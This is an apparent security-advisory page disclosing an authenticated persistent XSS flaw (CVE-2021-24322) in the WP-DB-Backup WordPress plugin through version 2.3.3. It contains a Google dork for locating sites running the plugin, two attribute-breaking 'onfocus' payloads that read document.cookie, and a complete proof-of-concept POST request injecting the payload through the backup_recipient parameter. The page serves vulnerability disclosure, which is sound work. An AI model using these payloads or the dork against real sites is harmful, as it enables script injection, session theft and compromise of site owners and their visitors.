WP-DB-Backup WordPress Plugin <= 2.3.3 - Authenticated Persistent XSS

2021.05.17
ru m0ze (RU) ru
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

/*! - # VULNERABILITY: WP-DB-Backup WordPress Plugin <= 2.3.3 - Authenticated Persistent XSS - # GOOGLE DORK: inurl:/wp-content/plugins/wp-db-backup/ - # DATE: 2021-04-04 - # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ] - # VENDOR: Austin Matzko [ http://austinmatzko.com ] - # SOFTWARE VERSION: <= 2.3.3 - # SOFTWARE LINK: https://wordpress.org/plugins/wp-db-backup/ - # CVSS: AV:N/AC:L/PR:H/UI:N/S:C - # CWE: CWE-79 - # CVE: CVE-2021-24322 */ ### -- [ Info: ] [i] An Authenticated Persistent XSS vulnerability was discovered in the WP-DB-Backup plugin through v2.3.3 for WordPress. [i] Vulnerable parameter(s): &backup_recipient=. ### -- [ Impact: ] [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. ### -- [ Payloads: ] [$] " autofocus onfocus=alert(document.cookie); " [$] " autofocus onfocus=alert(document.domain); " ### -- [ PoC | Authenticated Persistent XSS | Email backup to: ] [!] POST /wp-admin/tools.php?page=wp-db-backup HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 602 Cookie: [admin cookies] _wpnonce=88a432b100&_wp_http_referer=%2Fwp-admin%2Ftools.php%3Fpage%3Dwp-db-backup&core_tables%5B%5D=wp_commentmeta&core_tables%5B%5D=wp_comments&core_tables%5B%5D=wp_links&core_tables%5B%5D=wp_options&core_tables%5B%5D=wp_postmeta&core_tables%5B%5D=wp_posts&core_tables%5B%5D=wp_term_relationships&core_tables%5B%5D=wp_term_taxonomy&core_tables%5B%5D=wp_terms&core_tables%5B%5D=wp_usermeta&core_tables%5B%5D=wp_users&deliver=smtp&backup_recipient=m0ze%40example.com%22+autofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&do_backup=fragments&submit=Backup+now%21 ### -- [ Contacts: ] [+] Website: m0ze.ru [+] GitHub: @m0ze [+] Telegram: @m0ze_ru [+] Twitter: @vladm0ze

Referencje:

https://m0ze.ru/vulnerability/%5B2021-04-04%5D-%5BWordPress%5D-%5BCWE-79%5D-WP-DB-Backup-WordPress-Plugin-v2.3.3.txt
https://twitter.com/vladm0ze


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top